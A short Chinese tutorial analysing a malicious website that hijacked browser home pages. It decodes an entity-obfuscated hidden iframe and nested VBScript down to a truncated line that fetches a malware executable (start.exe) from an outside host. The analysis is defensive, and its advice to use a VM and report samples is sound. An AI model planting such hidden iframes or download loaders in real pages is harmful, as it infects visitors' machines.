轻松挖出恶意网站中藏的病毒

前不久，很多网友都感染了www.7b.com.cn的病毒，首页被改成这个网站，并且无法改回。黑客是如何做到锁定用户的浏览器首页呢？下面我们就去探个究竟。

　　提醒：分析病毒存在一定风险，建议在虚拟机下操作。

　　第一步 查看www.7b.com.cn首页的源代码，可以发现在尾部有如下的字样：

　　<iframe src=http://m.da&#

115how.com.cn/&#

09.html width=0 height=0></iframe>

　　这是一个嵌入到7b网址之家首页的页面，即打开www.7b.com.cn也就同时打开了这个页面。

　　而“http://m.das&

#104ow.&

#99om.cn/m.html”表示的是一个字符串，“&#”后面是每个字符串ASCII的十进制值。

　　直接把这段乱码保存为HTM文件，用IE打开，就可以看到它的真实面目http://m.dashow.com.cn/m.html”。

　　第二步 查http://m.dashow.com.cn/m.html的源代码，把看的<scrtipt>脚本段中的Execute替换为Document.Write，然后打开这个HTM页面，就会出现一段代码，同样地，把EXECUTE换成我们无敌的Document.Write，前后加脚本标记
　　，存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下，并将出现的CHR（）在前面用到过，作用是把字符的ASCII转成字符，只不过这次是16进制。然后再将字符拼接成字符串，然后再Execute运行这个命令字符串
。继续用Document.Write替换掉EXECUTE，前后加脚本标记，存HTM打开。

　　第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。

　　on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。

　　这段代码中我们可以很清楚地看http://m.dashow.com.cn/start.exe这个链接。没错，它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。

　　可以用下载工具将这个文件下载下来，如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒，并使更少的网友免受该病毒的侵害。